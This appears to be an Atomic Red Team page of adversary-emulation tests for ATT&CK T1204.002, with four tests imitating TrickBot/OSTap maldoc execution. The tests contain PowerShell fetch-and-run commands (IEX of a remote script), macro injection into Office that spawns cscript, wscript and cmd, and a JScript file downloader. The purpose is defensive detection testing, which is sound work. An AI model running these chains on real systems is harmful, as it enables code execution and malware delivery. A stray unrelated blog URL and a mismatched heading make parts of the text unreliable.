T1204.002
User Execution: Malicious Link
Description from ATT&CK
An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/
Atomic Tests
Atomic Test #1 - OSTap Style Macro Execution
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
Supported Platforms: windows
auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| jse_path | Path for the macro to write out the "malicious" .jse file | ||
| String | C:\Users\Public\art.jse | ||
| ms_product | Maldoc application Word or Excel | String | Word |
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0 |
Attack Commands: Run with powershell!
1
2
3
4
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
Cleanup Commands:
1
2
3
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Dependencies: Run with powershell!
Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
Check Prereq Commands:
1
2
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Atomic Test #2 - OSTap Payload Download
Uses cscript //E:jscript to download a file
Supported Platforms: windows
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js |
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt |
Attack Commands: Run with command_prompt!
1
2
3
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
Cleanup Commands:
1
2
del #{script_file} /F /Q >nul 2>&1
Atomic Test #3 - Maldoc choice flags command execution
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.
Supported Platforms: windows
auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| ms_product | Maldoc application Word or Excel | String | Word |
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0 |
Attack Commands: Run with powershell!
1
2
3
4
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
Cleanup Commands:
1
2
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Dependencies: Run with powershell!
Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
Check Prereq Commands:
1
2
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Atomic Test #4 - OSTAP JS version
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.
Supported Platforms: windows
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse |
| ms_product | Maldoc application Word or Excel | String | Word |
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0 |
Attack Commands: Run with powershell!
1
2
3
4
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
Cleanup Commands:
1
2
3
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Dependencies: Run with powershell!
Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
Check Prereq Commands:
1
2
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD